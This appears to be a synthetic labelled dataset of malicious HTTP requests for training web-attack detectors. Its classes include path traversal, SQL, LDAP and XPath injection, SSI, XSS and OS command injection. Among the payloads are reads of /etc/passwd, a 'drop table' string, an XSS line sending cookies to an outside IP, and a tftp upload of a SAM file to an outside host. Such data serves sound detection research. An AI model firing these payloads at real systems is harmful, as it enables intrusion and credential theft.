If-Modified-Since: Thu, 21 Aug 08 01:31:33 GMT
If-Unmodified-Since: Fri, 15 Apr 05 03:17:26 UTC
If-Match: "WQnv_nooPV9RPaH@vB"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM Z0VhaGFlc29hbWhuZWhkSG9sbkx0bGxvbnRjZnJvc2x1dDk1bnByaGxvaHI0cDY=
Authorization: Basic aW9JRDphZXRzNXJ0dA==
Range: 049731-813,22-
Referer: /d1ya/egzatum/raep.cfm
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: gcpoahDxe/6.5
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: 6.2 www.ehrcVp.tiff
Transfer-Encoding: identity
Upgrade: pen/9.1, ccf/6.5
Warning: 241 140.186.56.188 "eynAOe7ebztnrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 2379709487507553302
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47112
Start - Id: 46284
class: PathTransversal
GET /@Xu/jimsnereic.shtml?hte7l2aoh2qauhs=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0
Host: 233.161.161.183
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-chinesetrad;q=0.1, windows-1250;q=0.7, iso-8859-8-i, iso-8859-8-i;q=0.3
Accept-Encoding: 
Accept-Language: s-tmtWtlyn, rtexnor-ltMhto;q=0.8, i-a;q=0.0
Cache-Control: only-if-cached
Client-ip: 54.146.114.194
Cookie: 4dQ=y2H4retigxeobtyism;9qaccess_logBDxmljandxp_=ectuel3rsse4msyhaq;4nlstiwIl=cconnectis;dnoeaher8=sot8tEh;6a8m=ubs6_x63d0NO
Cookie2: $Version="3"
Date: Fri, 31 Mar 06 03:42:34 GMT
ETag: W/"Tr79t_UXhl_B.uI5Su"
Expect: 100-continue
From: rhcEtdlT@plt6rnlmRh.it
If-Modified-Since: Thu, 20 May 04 12:37:10 GMT
If-Unmodified-Since: Thu, 18 Mar 10 24:25:32 UTC
If-Match: "qQGXZdTgFVV2GicZ2Yz"
If-None-Match: *
If-Range: "F2AXr@tKv_gxtA4KF"
Max-Forwards: 5
MIME-Version: 4.9
Pragma: nehtx=iror3
Proxy-Authorization: Ceatcl leufemEy=AhEdaAee
Authorization: Basic ZXRyOUk6N2xtc2g=
Range: 5-,07-2
Referer: http://ianAe.uk/drim/cowtiot.rar
TE: gzip;q=0.8,gzip;q=0.2
Trailer: If-Unmodified-Since
User-Agent: dohocs
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: HTTP/4.5 www.hoilnfta.jpeg, son/7.5 www.ee4twimK.js, HTTP/4.0 www.kcyeNoeD.htm
Transfer-Encoding: dseWa; err7=sIiEEEF
Upgrade: Su9qj/8.6, baec/7.2
Warning: 283 165.131.195.235 "tsglezenghAmr73slp" "Sat, 19 Sep 09 07:14:05 CET"
X-Forwarded-For: 136.2.161.83
X-Serial-Number: 576547919315
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46284
Start - Id: 37198
class: LdapInjection
GET /ll0pGX/iDof/waohpseeds/xoelAe7wosc/nkwyX8PsKChr6o93/uclgj/ri_sf8AFZm3a.msf?rSN9zEnhr7kSs=%29++%28+++%7C+%28tr%3Ddr*%29 HTTP/1.1
Host: www.A9n5oatm0n.fr
Connection: tdao0dem
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.7
Accept-Language: e-uE0do
Cache-Control: no-store
Client-ip: 147.130.90.175
Cookie: nsinet55O=h5vcNheG
Cookie2: $Version="0"
Date: Thu, 01 Apr 04 01:48:47 CET
ETag: "jWUARu-3c1x8dSRpo7"
Expect: 100-continue
From: oesr@teho3i.biz
If-Modified-Since: Thu, 22 May 08 16:00:52 GMT
If-Unmodified-Since: Wed, 08 Feb 06 12:50:40 CET
If-Match: "UKV5qTybQXfzRvhAF_"
If-None-Match: *
If-Range: Thu, 31 Mar 05 07:28:16 CET
Max-Forwards: 6021
MIME-Version: 2.5
Pragma: ZEsrun='olo'
Authorization: Digest uri=http://www.tsseMmau.be/eehrvs3/8hrsodne/cenAmoa/sigldaor/zdnrdnn.pdf
Range: 605-286224
Referer: /tdc1/lyostb/euynl/woRr6ce/a7atoagc.html
TE: gzip;q=0.6
Trailer: From
User-Agent: Mozilla/7.0 (compatible; Konqueror/2.9; Unix; eeiefhot; pntrerhhin)
UA-CPU: Sparc
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0874x8291
Via: HTTP/4.4 www.hzriwNle.jpg
Transfer-Encoding: deflate
Upgrade: resPct/8.2
Warning: 861 www.yirfos.jpg "e6bssmnatemnd" "Mon, 24 Nov 08 01:28:57 CET"
X-Forwarded-For: 209.47.70.154
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37198
Start - Id: 39807
class: SSI
GET /rfFiYCL_RMYXbhTtmc/tvGtsoeoneowThnHy6r3/suuteoer3oeu.js?RmLbnnetoeScsn=haCun&wCNhW26NO5Q=7214&swT=ptgiw%24eevrr&OQTftelnet=oznEew.14&aoOkaoohIsgl=u1_SexWKMDsW&IeAidesEK6ig=78062&lrePNo=6&onjssiutxAitz=sachps%3Biietctdie%7E&p714300=cDa9stusLlmntA&eE=%3C%21--+%23include++++virtual%3D%22%2Fetc%2Fpasswd%22++++--%3E&scoi3tntbaI4w=input&5xenI=evigo&otfw4los=e.tC&kekUtritg4=01297&ooetua8d=eesFb69oarelo1a7ed HTTP/1.0
Host: www.hrnprnA.gov:82
Connection: raNeyle
Accept: */*
Accept-Charset: windows-1254, euc-kr;q=0.6, gb2312;q=0.0, iso-8859-5, iso-8859-2
Accept-Encoding: *;q=0.4
Accept-Language: oigyrlt-dshpple;q=0.3, ed-fete;q=0.6, VOon-sh684
Cache-Control: no-transform
Client-ip: 43.200.222.134
Cookie: 2QWMY4YZ1=2tI esteypaSrug;rhaHreszoaaax37=RiElipA;ms-G=1973;rtnryolitobe0=eDassoeiey
Cookie2: $Version="9"
Date: Tue, 27 Oct 09 16:53:09 GMT
ETag: W/"HB4MgAj2e0M.0QXb"
Expect: 100-continue
From: bny0t2@rj5o.gov
If-Modified-Since: Tue, 08 Dec 09 20:47:00 GMT
If-Unmodified-Since: Sun, 29 Mar 09 15:33:08 UTC
If-Match: "5S2a5xeq29wu6Auy"
If-None-Match: *
If-Range: Sun, 15 Jun 08 07:53:42 CET
Max-Forwards: 9776
MIME-Version: 1.9
Pragma: f5r=8li
Proxy-Authorization: thos inow=tceine
Authorization: Basic bzRhZzpIazdSdGFpaA==
Range: 9717-347450,4-
Referer: /xthtowk/t2ot6o/cliu/e0sttto/sgLR.nsf
TE: deflate;q=0.4,gzip;q=0.6,trailers
Trailer: Connection
User-Agent: Mozilla/5.7 (Windows; U; Win98 7.2; ue-tw; rv:6.0.5) Gecko/06043179
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 468x7869
Via: 3.0 223.213.41.58:544, HTTP/1.3 144.44.248.41, FTP/6.0 250.151.244.186
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 410 230.107.4.184 "ldn6oohitmEt6c" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39807
Start - Id: 41593
class: SqlInjection
GET /OjWPV4AtRiG9-W/mReH9Exdehsid3s/ekoseen/ve30odhhdht/x.-J2SuB/eBNEQUUUP/eeil/jmWfrom0kxg/dqXr/t9ivI.jpg?4mai2m=q6a&drNEfulamyutto=wun+nstyleeer&cqrtdfiteeshSrl=%27++++OR+%27vgnse%27++BETWEEN++++%27R%27+++++AND+++++%27T&ihiStthUs=ereld0ilr&nhHfdo7ehcstN=t%28+replaceon HTTP/1.0
Host: 168.255.52.251:9
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: isTnmnaX-c, ste-ss;q=0.7, 8eeatf-c;q=0.0, t-eyi;q=0.4
Cache-Control: eads='igs6'
Client-ip: 234.115.185.119
Cookie: cibo=jbY9;wlcopyzexecTUN62rz=euFdR76k;8dnuee=eneo;aN1Nlhi=763
Cookie2: $Version="675"
Date: Tue, 16 Oct 07 11:29:14 CET
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: eqidtzo
From: mainn@tiee.st
If-Modified-Since: Mon, 23 Mar 09 17:01:17 CET
If-Unmodified-Since: Fri, 28 Nov 08 04:04:24 GMT
If-Match: "ahuKAN-.KIDr2k9Abc@"
If-None-Match: "H3z-6TTwNx-g5OH"
If-Range: Sat, 16 May 09 10:03:13 GMT
Max-Forwards: 3
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest nc=d0D8Cc0E
Authorization: Digest qop=auth-int
Range: 7594-
Referer: http://nsf7ag.st/rfnnti/sltbiera/fTsipSi/o8amlb.cgi
TE: trailers,trailers,chunked
Trailer: If-Range
User-Agent: rhehtgdrhahfpjt
UA-CPU: StrongARM
UA-Disp: 8644,7671,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 1.6 103.244.78.247
Transfer-Encoding: SmFhre
Upgrade: nmx/9.3, ydSwut/0.9
Warning: 847 www.anleg.shtml "zrln1iauersja5tRdVtt" "Tue, 11 Apr 06 24:20:03 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41593
Start - Id: 37257
class: LdapInjection
GET /iArZ3TluFm/sCfy-/czlQc_sEoW7.j-L0m.php?aI5tnto=scihdion+sev&zoriOl=5&eh8Rnru=dG&aisgd=aecho&qkL0DKI=inputl%3D&pucz=stutrzAnt&xainsert1P.stdinQlmocha=ewherehe%5Cn3rxlntfa&ifawwjm=o0qZY&i6une0owhr=1041&oyrte2=xyf0nr&FV5Z=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&5yLBznode-W=eeO4pvtkpassthrutftp&aatfaed=7272147 HTTP/1.1
Host: www.tonbtei.cz
Connection: close
Accept: application/x-tar;q=0.0, application/x-tar, text/*;q=0.7
Accept-Charset: iso-8859-4, x-mac-cyrillic;q=0.1, x-mac-ce
Accept-Encoding: identity;q=0.8, gzip, identity;q=0.4, deflate;q=0.0
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 140.231.249.168
Cookie: ameiir=95799;cj=35yynhrn;2esrolep2pp=e9zdJ1i5+evs
Cookie2: $Version="99"
Date: Thu, 07 Oct 04 01:06:30 GMT
ETag: W/"bNc0uNmABEHOP3zCY98w"
Expect: 100-continue
From: tlclo@pOIec.be
If-Modified-Since: Thu, 07 Oct 04 12:39:52 CET
If-Unmodified-Since: Tue, 12 Feb 08 07:18:53 UTC
If-Match: "z8GYX7IxVZKCunqAL"
If-None-Match: *
If-Range: *
Max-Forwards: 3691
MIME-Version: 6.7
Pragma: aooal=hmfeui
Proxy-Authorization: oetuts 0iernty=iio4tep
Authorization: NTLM b21oZWVlYWN1c3NleGhnd3Vzc29sYm9paHN0bGV0ZXRzMnRsZTZuaHNsYXRp
Range: 690936-,5769-,6-
Referer: /ypatc/erse5dE9/ised.zip
TE: trailers,gzip;q=0.3,deflate
Trailer: Referer
User-Agent: Mozilla/1.7 (Windows; U; Win98 4.7; in-ip; rv:7.0.6) Gecko/32404277
UA-CPU: 68000
UA-Disp: 785,4501,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1371x144
Via: 9.9 www.eine.html, 4.7 www.iexT.jpg, 0.0 www.eteetq3.shtml
Transfer-Encoding: gzip
Upgrade: htlt/0.4
Warning: 419 57.72.62.225 "8qea3ieagcspza3ee" 
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37257
Start - Id: 41998
class: SqlInjection
GET /uaato7h5Irlatn4nssnr/FrpezXQr/oliawcdg1I/ih/pEeitdeirmy/ozXI9EPh.1L-msEpVx/ynyq2@aYhlUErkWDnEdo/rgtttcWte/odoe/mQoA/muLsteU.php?o3eptdfebheosm=c%3C%2FE&fsn=659465&eksomSoe9h6S2i=orw&Zpositionuc1includemiyo=passwdnodeNda8o+L%29t9n%24+stI&tAycw1spselh=or++0%3C%3E%28select+++++count%28*%29+++from+++++seu%29&aIedNsxt=aflotlYasurC6&jyol=std HTTP/1.0
Host: www.eNesywri.it
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-7, gb2312, x-mac-hebrew;q=0.4
Accept-Encoding: gzip, compress;q=0.5, deflate, gzip, compress;q=0.4
Accept-Language: *;q=0.1
Cache-Control: max-stale=31
Client-ip: 134.245.214.117
Cookie: cM7hts=zCvF;itjorcbhtinl=hKFxRblhY5y5;TNx6dTGgroup byoDC=ranOp;oneleaaoeUysetg=wTRwx-I1C;ni_aBV5@WHZE=e;dhisnessgswle=89rohb
Cookie2: $Version="419"
Date: Thu, 29 Nov 07 06:36:57 GMT
ETag: "VjP__Uh7jvJaJAs2qgs"
Expect: qdhiW=zajnoi;dhetiyu
From: wXro@erouh.com
If-Modified-Since: Sun, 02 Nov 08 14:19:39 CET
If-Unmodified-Since: Sat, 30 Jan 10 01:03:29 UTC
If-Match: "TA98GTAGo2h3BA5U"
If-None-Match: "hIF.wyGGL9FSdJq"
If-Range: *
Max-Forwards: 105
MIME-Version: 0.8
Pragma: usUbw=enbrvd
Proxy-Authorization: Basic eGFpYWg6ZVlubGxzUg==
Authorization: Digest opaque="5ntntDl"
Range: -728027,84041-8,736156-
Referer: /sUtoso/e6spa/wmmuc1/kaifti/0rslhO.pdf
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: ehoeI (ha14ALzF8a; jZm-Y3E; aKFVb.2Mvt)
UA-CPU: StrongARM
UA-Disp: 3403,6201,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 721x544
Via: 3.7 231.241.184.146:8957, 8.3 221.60.38.0
Transfer-Encoding: compress
Upgrade: tsem/9.8, icrMn/2.4
Warning: 861 www.leOkisE.js "t5dd1agosNnsneae" "Sat, 17 Apr 04 02:49:48 UTC"
X-Forwarded-For: 227.242.186.30
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41998
Start - Id: 41710
class: SqlInjection
GET /ifWSutvar4@BXv1rg/sF2e8tk-A_NQI6UNL/qjO_y.Awy_r/tc29U.shutdownfEkRK6/e2.8b.t5YI.js?uchorteeok=i-TvSI0bE&styleosKlog=3503130&hNt8roe=hr-3is%3B%26suqeo%26%7Cdryp%3E&hiy=nIa8cz&onilVe=7&riSar=r7jowgv3&oiebwEtgL=4&tish1kgy=sRPcZGq&beTnrq9o5Renja=933&zNBhQG9=%3B+exec++++get_cust%28+%27x%27%27++++union++select++object_name%2Cobject_type%2C%27%27x%27%27+from++++user_objects++++where+++++%27%27uabhnrhula%27%27+%3D++%27%27++%27+++%29%3B&VRpK3A6iXcJ=4&uoeyhgirsrsRh4a=zpsE%2BJhstdinc+%2Bmttq0&i50gNpLQkrtmp=outxlhxmlatstu&Dad1lyatghmmia=%5Dpf+ylkt%2Fe%40Do HTTP/1.0
Host: 201.83.32.42:80
Connection: rjuts
Accept: */*;q=0.5
Accept-Charset: us-ascii, x-mac-chinesesimp;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 17.192.139.19
Cookie: acnti=e4Y32uwP._;XwGWU.L=rRZ6XQ0;ahbt5utrger=13;tascanopecn=uIXo
Cookie2: $Version="0"
Date: Mon, 28 Dec 09 08:54:24 GMT
ETag: "mHG3bYJqA@kA-OU9"
Expect: 100-continue
From: oo2sso@fOothntR.fr
If-Modified-Since: Fri, 25 Feb 05 12:24:40 GMT
If-Unmodified-Since: Fri, 22 Jul 05 20:23:29 GMT
If-Match: "GlBGxIFWRYIOYCD4w"
If-None-Match: *
If-Range: Fri, 27 May 05 17:51:41 CET
Max-Forwards: 36
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic TEFhazM0ZTpwdGU1ZWM=
Range: 864538-4,42725-309719
Referer: /e0teoof.msf
TE: chunked;q=0.7
Trailer: Via
User-Agent: Mozilla/3.6 (Windows; U; Windows NT 0.3; rs-HE; rv:7.8.9) Gecko/31397133
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8765x189
Via: HTTP/0.2 www.orcbefoE.html, 6.9 81.211.65.19
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 916 www.eheltm.css "rn5mT" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41710
Start - Id: 47455
class: XSS
GET /aDSNKamFa2@Mmgbxmbrf/-nHhZONCmBPb/g2e2XsuEu85aipaiz/dIea2oh.jpg?ia=tGoW&bsoa=qsystemobjectjvar&hoo=Hawi&atsAJ=nw2FR01y_&ntrr=eenNt&taulla6ahIg2ehr=c9a%3C&or8iqopt=11&afrAray3iin=2homeA&citmnre=582827&rsbeeaabtnbio3H=%3Cdiv++++style++%3D+%22++++background-image%3A++url%28javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F229.75.212.119%2Fllni.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B+%22++++%3E&ef2cslPbgc=sYoJJx_5Z HTTP/1.1
Host: 28.122.13.116
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-arabic;q=0.0, windows-1252, x-mac-chinesetrad, iso-8859-4;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=03
Client-ip: 142.227.179.102
Cookie: tva=uwindow.openhome1;rWuiutYt=65355443;weowtOrs= as;ugeeflvtll=brdnh;r4trn=83;Iynei4tixx=39
Cookie2: $Version="073"
Date: Wed, 14 Dec 05 18:31:01 CET
ETag: W/"rp9_AP4VQ-1SnvWS"
Expect: 100-continue
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Sun, 09 May 04 22:25:54 UTC
If-Unmodified-Since: Mon, 29 Nov 04 18:59:54 GMT
If-Match: "BsBhTYni4neyorVU2"
If-None-Match: *
If-Range: "E8xMKufH0cdVvARJ"
Max-Forwards: 0
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest algorithm=erorm7y
Range: 9547-817639
Referer: /n3nr1/aaiedrf/eArfhd/traEcb/oLttps.mdb
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/5.0 (X11; U; Linux i386 1.4; Tb-hj; rv:6.6.2) Gecko/45558170
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4532x5831
Via: HTTP/4.5 190.174.118.201, HTTP/6.5 193.41.121.221
Transfer-Encoding: deflate
Upgrade: If3b/5.7, ceh/7.0, ns8/1.8
Warning: 308 www.aenio10r.gif "lnesbftg" "Sun, 10 Aug 08 14:30:39 UTC"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 226091720709125
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47455
Start - Id: 41263
class: SqlInjection
GET /9inatemnbim0mr1til/eeah/ibCUWnxppnKdvA3/8H-fxSuhCBX/nAy5HaiH35SpB@EHGL/SvrserrEralerur/rPGHWcu4VuYW0ukBDP/ohi2esAhtby8tmhe.jpg?inea88ndtms=eunr%3Erziarcpre&syioaeg=tj6yxKENh&xmlunionw_=569&1s=hdauh&ie3vielEEaeifl=delete%3Dsnlogt3execmailS7&st=h%25&ue0Wru0miq=2rahlKKowhaarI&ennnoo=tsugs&bmeezlT=4409&6iei=NinpmGw0dearIImb&tlteim=r9-JAcaolg&neotusi=odpaHe+%3CoustdinohtlSetp+&opiH4=50906&kroe5oaottiihmo=u3t%40i HTTP/1.1
Host: 38.77.22.221
Connection: keep-alive
Accept: audio/*;q=0.2, image/*;q=0.5, image/png;q=0.5
Accept-Charset: iso-10646-ucs-2;q=0.4, iso-8859-1;q=0.3, x-mac-arabic;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: ioithi-i, seneAk-u
Cache-Control: no-store
Client-ip: 128.207.222.170
Cookie: gc9EzwtNmeo=vk;Dcr8i15laie=';  drop  table admin;ahet0ArdA=d4U@
Cookie2: $Version="540"
Date: Wed, 20 Jul 05 16:37:30 CET
ETag: W/"4byGeaXhYtAs85QO"
Expect: 100-continue
From: sadkb6h@raise.cz
If-Modified-Since: Mon, 18 Jun 07 18:19:24 GMT
If-Unmodified-Since: Tue, 10 Nov 09 22:47:39 CET
If-Match: "jkx9nvTegIvEZ15F5"
If-None-Match: "Utz2A8y2oGw3M41"
If-Range: *
Max-Forwards: 57
MIME-Version: 5.3
Pragma: yoheiD=hej9togS
Proxy-Authorization: Digest username="htctmgeT"
Authorization: Basic dmU2aGRlZTplYWZpeQ==
Referer: http://doey.uk/9itjrrf.swf
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: otbarnsti (h_GKOSm4g; mDe7.X9T)
UA-OS: Win9x
UA-Pixels: 557x1445
Via: 5.9 200.252.40.231, HTTP/0.8 www.fwmm.shtml:932
Transfer-Encoding: identity
Upgrade: tlgr/4.4, ljio/8.8, tl6ref/8.3, pae/1.6, eT90bs/9.1
Warning: 519 217.122.200.168 "6se8ge5cmOttd" "Mon, 03 Apr 06 24:00:47 GMT"
X-Forwarded-For: 31.90.227.178
X-Serial-Number: 183973822
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41263
Start - Id: 45356
class: PathTransversal
POST /nI.css? HTTP/1.0
Content-Length: 365
Content-Language: ba
Content-Encoding: gzip
Content-Location: http://www.Qeel.gov/Ewoodsdl/teGadzaa/eepetsr.dll
Content-MD5: cHM4ck9kczZpc3lpbm53aQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 15 Aug 09 23:51:11 UTC
Host: www.aiaeohbst.ch:52
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: ockxt7c-ano5tek, dase9ee-anll;q=0.7, eoAar-rpqDLeei;q=0.3
Cache-Control: no-cache
Client-ip: 195.135.237.8
Cookie: rchildketSM-_DX=8008
Cookie2: $Version="3"
Date: Tue, 03 Oct 06 21:42:54 UTC
ETag: "5FKhCbL9g@J-mEhNi3sB"
If-Modified-Since: Wed, 16 Dec 09 10:23:14 UTC
If-Unmodified-Since: Thu, 18 Feb 10 05:46:32 UTC
If-Match: *
If-None-Match: "W13Lr9PZLtNYx7nB81zj"
If-Range: Wed, 13 Jun 07 20:48:57 GMT
Max-Forwards: 97
Pragma: cnIs=aryeu
Proxy-Authorization: NTLM OWl0bmdqbmhuZTZNbmllYnJUS1NlZTBvbW5yaXJvRWFpZ2VlaGUxZURzYWd4
Referer: http://i2ndseah.be/zisOa/bkTi73nS/brveeoa/fdpoe.fgf
TE: gzip;q=0.6,chunked;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.2 (Windows; U; WinNT 9.8; Nt-ra; rv:8.2.6) Gecko/77693804
UA-CPU: Sparc
UA-Disp: 8038,017,16
Via: 4tt/5.1 233.254.38.37:2703
Transfer-Encoding: identity
Warning: 500 www.csfpew.js "Upisof2goah" 
X-Forwarded-For: 42.158.87.228
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mc=4u_euRhAaO&8_sD=/../../../Inetpub/iissamples/detitrch/inlasiit/la/in.dll&connectihand=845&efiiesneivo=newa sock_streamas4avTsgimg5e&tisA2rD4dtmo=ye&GunionP5boot.iniy= ucat&8ivenr=koece&loRriIssdaefaE=ntta o)stdina&VCeB.Le=ojCi&ooaUnntsapn1= IaA<hscripthtetw1ps3oa&saiSNnemxryl=anr9t&ionhWxhhsnw5=ygj9ddEte&t6aptnesnm=76871&sivlnnogo3oa=7160

End - Id: 45356
Start - Id: 49789
class: XPathInjection
GET /0Y@EMX6QJ/u9v/ff@/osae9CubA/adprivtnhlewnrwwtuur/_UepasswdHH3_X/ai@9LIehDIhm_avmK.swf?sitd9Nl=Ti6wrEumo&iaehersNi=aeo&tidek5hOr=le%3C&rFttsgxT=ytB7&ntsnts=oEt5y%2Fua%2Fly7fu%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D0%5D++or+%27itse6tr%27%3D%27&8jn7ifa=AeiT&can=qhteoret&nsarhd8ErE=nmijmExn0JiechSe&apAe=+2&K571S8AYJ=6946&stzbOweasm2reL3=83044437&9JJHDZ=y-wu-dTgj4Y&D6HNlyis=exMT1bM&hpfesbeiAl=rlc+&M4rFxvmnj5telnetm=115674 HTTP/1.1
Host: 91.138.9.163
Connection: dtoNh5o
Accept: audio/x-wav;q=0.2, image/png
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.9, compress;q=0.9, gzip;q=0.4, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 136.54.232.161
Cookie: ss64Rtrls9tr05=a13vnwiopqtfi;uhulvdttlo2ey=rt3xse;eHl2=3;etLt9sindddFi=ri;isutrgsawoecw=1m8iwp-like?n]5wds&n|0 
Cookie2: $Version="615"
Date: Fri, 28 Oct 05 10:31:12 UTC
ETag: W/"8Nw-K59c314vRFuXk"
Expect: o7eBsmo9
From: terol@hDey.ch
If-Modified-Since: Wed, 13 Jun 07 22:12:45 GMT
If-Unmodified-Since: Tue, 16 Jan 07 03:39:54 UTC
If-Match: "21xV8lq1YexCGKrOQ_X"
If-None-Match: *
If-Range: *
Max-Forwards: 703
MIME-Version: 5.9
Pragma: 3eh=Urn
Proxy-Authorization: Digest nonce
Authorization: Basic a090bmhhdzpodHR1
Range: 1-,586-,-3399
Referer: /toRavrt/O7tdho.bin
TE: trailers,trailers
Trailer: Connection
User-Agent: hSJ.IG http://www.gTeh.cz
UA-CPU: x86
UA-Disp: 662,518,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 742x2872
Via: 8.3 232.104.30.181:8, 1.3 84.107.70.98, 5.5 www.toone.htm
Transfer-Encoding: tydgD
Upgrade: afn/1.9, wee/7.0
Warning: 792 www.nWnon.js "8t72nuuaga4Mefialtf" "Sat, 08 Jan 05 22:28:36 UTC"
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 13614993900789849
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49789
Start - Id: 44605
class: OsCommanding
GET /yIsh6Decsn5jrtyanrq/eeKY/inM-mk992TB.lm8aQT/etxfkRrTx.XE4eg_SHOJ/81eo/a@bD/dQc9A/hetn4scaecXqcbnObdm.asmx?m80ESwFhDW=1710527&tsnhNowfceuTat=t&3rpivatelw7Jkt3=56719776&pCeHriieu0oa=203.252.181.37+%7C++++tftp+++-i++++75.49.119.191+++++PUT+sam._&tos70aOEdmOb=onmro5emarcmdereopt&fS3iframeYgobjectYz@_i=7BrCeGi7Gnm&4O7YU=45267&3ygHuiEmlla=h+anullH HTTP/1.1
Host: 175.174.157.34
Connection: e3istvsr
Accept: application/*;q=0.4, text/*
Accept-Charset: iso-8859-8, hz-gb-2312
Accept-Encoding: gzip;q=0.8, gzip;q=0.9
Accept-Language: *
Cache-Control: max-age=62437
Client-ip: 234.131.254.239
Cookie: Csaehdtthkjnhj=802;eci=626936;lmo=7;li5vaeT3sItggeu=10647
Cookie2: $Version="67"
Date: Sat, 28 Feb 04 16:47:17 GMT
ETag: "YiQ@0NMwQ2OIQMTOOMbh"
Expect: 100-continue
From: 8sf9@dbeln5gatO.gov
If-Modified-Since: Thu, 20 Nov 08 03:56:32 GMT
If-Unmodified-Since: Thu, 05 Oct 06 12:29:28 UTC
If-Match: "gBM_dAGU6ieKTuaJLGaJ"
If-None-Match: *
If-Range: Thu, 04 Nov 04 13:10:44 CET
Max-Forwards: 9469
MIME-Version: 1.7
Pragma: 1ctau='0u'
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Ntiork yesrssnr=smegluuc
Range: 41676-
Referer: /teoPx9ts/r2ten/eeenm/tm0cqii/yTov.fgf
TE: deflate;q=0.9
Trailer: Trailer
User-Agent: eepaTGghrii
UA-Disp: 0488,6492,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/4.4 191.31.16.89, 4.9 135.206.46.110
Transfer-Encoding: gzip
Upgrade: sraa/8.7, apdat/7.5, Eir8/9.0
Warning: 294 www.eeugeo2c.png "bVo5d8oDShGrt1n" 
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44605
Start - Id: 44259
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.1
Host: 242.175.217.240:158
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.6
